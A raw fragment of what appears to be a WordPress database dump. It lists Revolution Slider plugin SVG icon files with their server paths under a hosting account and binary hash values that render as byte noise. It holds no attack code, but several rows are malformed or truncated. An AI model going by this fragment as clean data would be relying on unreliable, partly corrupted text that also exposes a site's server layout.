{>O#v^@','GE645۲Q_2VlET','',0,'?'),('GVE$5G݁[yb','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows022.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows022.svg',0,'a\0 ǧCƔ^^','a\0 ǧCƔ^^',',4te_mqE,','',0,'?'),('0򾮉r^?lA{','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-scales.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-scales.svg',0,'-~;\0@&~','-~;\0@&~','Zu;tj\ru..A.L','',0,'?'),(':C>&\r8\0i\r','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-time.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-time.svg',0,'9{-','9{-','!1ָ~>g \\1\Zy +ѹ','',0,'?'),('XOy1 S ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-umbrella.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-umbrella.svg',0,'E,yav','E,yav','7㿾ΕuIOdh!Kdt@','',0,'?'),('E|}zBM>','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/phone.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/phone.svg',0,'I%+S8?','I%+S8?','\0mpF ut+ xQHb6','',0,'?'),('#ufUiR','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart01.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart01.svg',0,'L|R\'pg','L|R\'pg','v\n]igVH\ZY^.pvO','',0,'?'),('\r|ۈ-C [P','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pie-chart02.svg',0,'oq','oq','-WKAK|\r vB@C+ ','',0,'?'),('k @fx@','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/piggy-bank.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/piggy-bank.svg',0,'B賴OC\r7u','B賴OC\r7u','trAY','',0,'?'),('m;gxI','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart02.svg',0,'N:y)','N:y)','x!4/e.ͱvFj,DoW','',0,'?'),(']>ՌW%n6','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart03.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart03.svg',0,'#WB5Tђ^','#WB5Tђ^',' dҤ\',ewA ڑ >+=','',0,'?'),('k\rHR!N(','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart04.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart04.svg',0,' N\rS1*^MO',' N\rS1*^MO',';еT\Z\0b3xUʏ@MO','',0,'?'),('C5#;8v ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-laurels.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-laurels.svg',0,'҃0 <$','҃0 <$','~ݱjz mD`2=_g-Op','',0,'?'),('fr9}2EN','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-megaphone.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-megaphone.svg',0,'##ȋĪ`_','##ȋĪ`_','b1\"v}t3#;twg','',0,'?'),('2)DC','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-stairs.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-stairs.svg',0,'#qÐWl!1','#qÐWl!1','c(;/Rs+͵ڧFWjY','',0,'?'),('_+]:<','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/printer.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/printer.svg',0,'ziʁ\Z՚','ziʁ\Z՚','kRV,!n89ń?','',0,'?'),('^\0vV~G[o)k','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/profile.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/profile.svg',0,'-3>VxuH@b\\','-3>VxuH@b\\','>AHs!PgG\0>s','',0,'?'),('v~rI:簀}K','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pulse.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pulse.svg',0,' LTaOGQ',' LTaOGQ','Zze;Wci\\Q *N~i','',0,'?'),('j͠[B\Zg','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/puzzle.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/puzzle.svg',0,'RdZ#cRmq_1','RdZ#cRmq_1','u4nQ@FmRh4ߘ9y','',0,'?'),('c?`dQl','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/quill.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/quill.svg',0,'5Ň&>%iL','5Ň&>%iL','x2~fc','',0,'?'),('FGŜA?KM','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket2.svg',0,'|;.lw8}','|;.lw8}','cK?Xb?t F4O+]uf3a\'% &/','',0,'?'),('g݆ёB$%','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruble.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruble.svg',0,'BN#Rw 1@','BN#Rw 1@','ǪkCIҒ3#rA?Xg`','',0,'?'),('fUn=@','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruler-compasses.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ruler-compasses.svg',0,':\0fA&sP0',':\0fA&sP0',';@U8^ŀf/?G`1YKy','',0,'?'),('Dz iC(=','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/safe.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/safe.svg',0,'%gލz݁Mq̻H','%gލz݁Mq̻H','q}_B QݰP35gФ','',0,'?'),('dchŢP9a','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sale-sign.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/sale-sign.svg',0,'49h [+','49h [+','&x> }[ͣqJ','',0,'?'),('VF*G','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/satellite-dish.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/satellite-dish.svg',0,'mOgF.-Z~','mOgF.-Z~','VצThiKf+\\}6E^yݞ2\Z','',0,'?'),('&i\Z(d1','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scales.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scales.svg',0,'u妪d_Ei-j>','u妪d_Ei-j>','p\Z+CDZĕ,Rz\'','',0,'?'),('/','',0,'?'),('wY\0TCg\r','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-chart.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-chart.svg',0,'Wr#/>7\Z','Wr#/>7\Z','wEM0pLKH׳_\"','',0,'?'),('/Q>+ޝ,m-/','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-exclamation.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-exclamation.svg',0,'`o\rSC)0K','`o\rSC)0K','r2eħ5(9C>[6.W{o','',0,'?'),('[l/U.OݏE|=m','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-gears.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-gears.svg',0,'㆏oUдnH\r!5笺q.X','',0,'?'),('E1\'\'Kŀ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-growth.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-growth.svg',0,'ę\Z9TO','ę\Z9TO','Gs*\"{UȂan*Cc','',0,'?'),('=NK(l#Ƽce8','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-money.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-money.svg',0,'[Vt3\rn~C','[Vt3\rn~C','ݜpw ^=|Uxૼy.N','',0,'?'),('T1(\"_','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-user.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-user.svg',0,'߻iҩ\Z','߻iҩ\Z','[kdb SFb; \"9ΞSy&Q,','',0,'?'),('!U_\\m~>','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone.svg',0,'%X7EZ%>','%X7EZ%>','Ծ^`Uipm\Z GyfgQ|H?\"','',0,'?'),('k\nlQlS? \n','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker.svg',0,'[wP+hn׃R','[wP+hn׃R','FʸִLP5UV񶳖rjOS}`V','',0,'?'),('&xYWA[qlV','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speaker02.svg',0,'/U\ZgW}3٩\Z','/U\ZgW}3٩\Z','AZT`q,0c*b1{hs?','',0,'?'),('qt簽)\rPq]$','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speech-bubble.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/speech-bubble.svg',0,'${1P}U','${1P}U','ecT&m>\\Dԡk$','',0,'?'),('o n)j6X!yU(','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/stamp.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/stamp.svg',0,'\'in\n4hT ','\'in\n4hT ','@mqKC^ҫk4KZﶦ߸6X','',0,'?'),('V\\ͯHPvK̒','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/star.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/star.svg',0,'` 9\\)jk','` 9\\)jk','d \nf?\\B!Dt9ƺ6','',0,'?'),('Lao$7','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/steering-wheel.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/steering-wheel.svg',0,'%7\0/A','%7\0/A','W-O<$Š~W','',0,'?'),('$NJfaIwC','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy03.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy03.svg',0,'W?C޼ln','W?C޼ln',')t9LY\n,A\rE؄@r\"YO3','',0,'?'),('J\rOLY>','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy1.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy1.svg',0,'B\Zhyj(|ԕ','B\Zhyj(|ԕ','G2#oh.SE%\"VRϵ\\Uƫ4','',0,'?'),(']\"M< -q|','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/strategy2.svg',0,'PD>b;<0YGPEK','PD>b;<0YGPEK','\nP>,{Φ ;%\n','',0,'?'),('#Vnt=G\r&','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/support-person.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/support-person.svg',0,'}31g\\ ','}31g\\ ','V7~($y]p졧_n5','',0,'?'),('\rM]) 5%','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-article.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-article.svg',0,'rk\\aK ','rk\\aK ',' =#ľ F Bbf0SzcguU','',0,'?'),('jۆ0]','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart.svg',0,'d>B\Z&ܦ','d>B\Z&ܦ','A\'L+\Z\0W@ j','',0,'?'),('Ŵ\Zd|+','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart2.svg',0,'x)r*\rI0.0g','x)r*\rI0.0g','c>+\\L͑60\nN䅷f(|\'z','',0,'?'),('!iB\\省<','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart3.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart3.svg',0,'lCy/yyQ','lCy/yyQ','RDՌgd8VO$_k','',0,'?'),('Im(̲','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-pie-chart2.svg',0,'f\r?g{3','f\r?g{3','_aiB͛PTNzmIi#(nA\n','',0,'?'),('mR;4','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet.svg',0,'G7ro9>','G7ro9>','H0\'܁l9L-RګFNPk!','',0,'?'),('LL!\0\0868U','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/target.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/target.svg',0,'Q*@2/U','Q*@2/U','܌ cُ<.K%=@>@7I1 Ad','',0,'?'),('|}Du=/dN','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/team.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/team.svg',0,'RԼ8;B0;Y','RԼ8;B0;Y','Xx`WsVi*xzRnQB+','^fɢMkq>+','wd-HOވO`ѕ)\\h','',0,'?'),('CN=A_','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools.svg',0,'~_zԸ','~_zԸ','%ss-\Z;ՂX,&/_!','',0,'?'),(',LۥK.\"','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tools2.svg',0,' юSP',' юSP',')țY%0','OfW>%0','x{M|R+@-I5a\0y','',0,'?'),('nVj||n;\\','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user04.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user04.svg',0,'%n0mtF','%n0mtF','؊,O!Zf+Q6WJ)FXPv','',0,'?'),('ޝC\0s\n','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user05.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user05.svg',0,'2+(Ý ۄl','2+(Ý ۄl','Lo\\6/ALN5$=1','',0,'?'),('6H \n m>S\n\0JЍ','',0,'?'),('\nݒA}jk$','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user09.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user09.svg',0,'(m_򾍝940','(m_򾍝940','\\QV/EiVh}?X)xǹF9i','',0,'?'),('mPhW/o@Ϛ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/users.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/users.svg',0,'{Lt,a\\ܴ','{Lt,a\\ܴ','8`?`N]軲ZjԦ','',0,'?'),('!+;qiv\Z','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/venn-diagram.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/venn-diagram.svg',0,'sX?|z\'%U','sX?|z\'%U','\\ZJ\"1V\0&~N\\','',0,'?'),('@ojX\\B','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wallet.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wallet.svg',0,'3ڑiT.ҫv ','3ڑiT.ҫv ',']h8HA!=C*L','',0,'?'),('3mųYI','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wrench.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wrench.svg',0,'hs4>>cx;','hs4>>cx;','Qoo{tbZk+\0','',0,'?'),('[^~*5`','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yen.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yen.svg',0,'fr^TD&_','fr^TD&_','M3h|J]}@f= 7 =','',0,'?'),('l,pBկLz','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yinyang.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/yinyang.svg',0,'[D)˯ ]4W\\','[D)˯ ]4W\\','Ʊ!QY}fS[i^&lo\'','',0,'?'),('z2T#]nS','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_business_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_business_24px.svg',0,'!lIWH\\`rt=VE=','',0,'?'),('pk=5wOuz+','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_24px.svg',0,'ƴ6ܛLA@J','ƴ6ܛLA@J','\Z{ڕX gm|ձ\';\0','',0,'?'),('g_m','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_outgoing_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_missed_outgoing_24px.svg',0,'\rte','',0,'?'),('ˍN.A6B|','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialpad_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialpad_24px.svg',0,' H]',' H]','g\ZHM9)dXK}x','',0,'?'),('W7\\c!\\','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_email_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_email_24px.svg',0,'1v):΢Xgu0','1v):΢Xgu0','^#Ûwzsn{Ѭ\",-ii','',0,'?'),('Wp[?~_L','',0,'?'),('CM%K.IW;(=','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_export_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_import_export_24px.svg',0,'|Ӣ\rezd|5','|Ӣ\rezd|5','5EaIj\n^_V$%cu-X˥','',0,'?'),('%joz|%*{\'','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_invert_colors_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_invert_colors_off_24px.svg',0,'*}V_','*}V_','mDK+f=&}w','',0,'?'),('oX2.j\Z„GtR','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_live_help_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_live_help_24px.svg',0,'c/j e*cY','c/j e*cY','ӊp+b< . ˴//H','',0,'?'),('XlR3&mi','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_off_24px.svg',0,'iۡGBF.%\n%','iۡGBF.%\n%','m}5<<x(,\n\'7@.֦j','iρk>.֦j','Z?0!:Y{aK$:.|:֛_A','',0,'?'),('2pyC3\Z','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_erase_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_erase_24px.svg',0,'uF \0YQWt','uF \0YQWt','9آ(cRظ<`~Vew','',0,'?'),('_ (ļΝp','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_lock_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_lock_24px.svg',0,'ieVgX0cњ*a','ieVgX0cњ*a','kZ%&!2;iXD ','',0,'?'),('>$$gi^','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_ring_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_ring_24px.svg',0,'$+[50D','$+[50D','\r~ φefΠ̧dL$','',0,'?'),('jƖ3JܪlI','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_setup_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_setup_24px.svg',0,'e5ܸܷU|E1','e5ܸܷU|E1','^Zu-:\"]#XES!MF \\','',0,'?'),('؋)T[ r','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_portable_wifi_off_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_portable_wifi_off_24px.svg',0,'OvnZy','OvnZy','\" oA|w gwwY\'+','',0,'?'),('S-O:R$h','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_present_to_all_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_present_to_all_24px.svg',0,'K@7\0YkH','K@7\0YkH','~ūbO zK,*-\0Y!S,','',0,'?'),('\n\",֢뒒','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_ring_volume_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_ring_volume_24px.svg',0,'5q*ap~#[','5q*ap~#[','=<^\"Fݸ@ϳ:yO8on','',0,'?'),(' %%|&0d?','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_screen_share_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_screen_share_24px.svg',0,'hA6.C7','hA6.C7','1[6w;$eF=b','',0,'?'),(' <>$c','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_speaker_phone_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_speaker_phone_24px.svg',0,'FcƹS.\n&!/I','FcƹS.\n&!/I','Їq2&;^\0xf~?','',0,'?'),('5n!Y|','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_landscape_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_landscape_24px.svg',0,'ߎX] r3}[k','ߎX] r3}[k','fX\n\'$UaBp\rSf\rR','',0,'?'),('= A@\'[^:/','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_portrait_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_current_portrait_24px.svg',0,'0SܼB_6?!zE','0SܼB_6?!zE','3ajb\07H+&6;(F7ލ$','',0,'?'),(' Ƶq264','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_landscape_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_landscape_24px.svg',0,'ߎX] r3}[k','ߎX] r3}[k','fX\n\'$UaBp\rSf\rR','',0,'?'),(' >\\Ja','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_portrait_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stay_primary_portrait_24px.svg',0,'0SܼB_6?!zE','0SܼB_6?!zE','3ajb\07H+&6;(F7ލ$','',0,'?'),('KGNe€M*rW','wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stop_screen_share_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stop_screen_share_24px.svg',0,'$Sē','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_gesture_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_gesture_24px.svg',0,'>֠\0HngxD','>֠\0HngxD','YŲ*ĈucGa ri','',0,'?'),('~[Ķi{,,2','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_inbox_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_inbox_24px.svg',0,'Y8B,tqWM5X','Y8B,tqWM5X','<98`)\'~R!\r','',0,'?'),(']51&\n p','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_link_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_link_24px.svg',0,'`t쭇J/','`t쭇J/','m.H(eN M','F>H(eN M','-=$̪pnG9H19g&+Kx','',0,'?'),('0{K,a+gA','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_redo_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_redo_24px.svg',0,'Sl̠4Dom','Sl̠4Dom','Bi(E [?3e>;vw}z','',0,'?'),('#PCNYT)','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_24px.svg',0,']`!r+TqW',']`!r+TqW','4>2T  \\dww`\ZUH','',0,'?'),('y\'L.eHƪ<v','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_24px.svg',0,'{uWwܘXN','{uWwܘXN','B+wOR.אZ;w:|','',0,'?'),('o^4l:K`ܛ18','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_outline_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_remove_circle_outline_24px.svg',0,'/P܏%\r~9ez','/P܏%\r~9ez','?6I)^FۜQT%aqw,T KK','',0,'?'),(')7`UƢB','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_24px.svg',0,'H4+jʛv*','H4+jʛv*','k/BU:4!(0.0*dQ(\"[9LNr*','wp-content/plugins/revslider/public/assets/assets/svg/content/ic_unarchive_24px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/content/ic_unarchive_24px.svg',0,'#{iKuUo','#{iKuUo','@QgD*b8[%+ D 1`X','',0,'?'),('.B~ 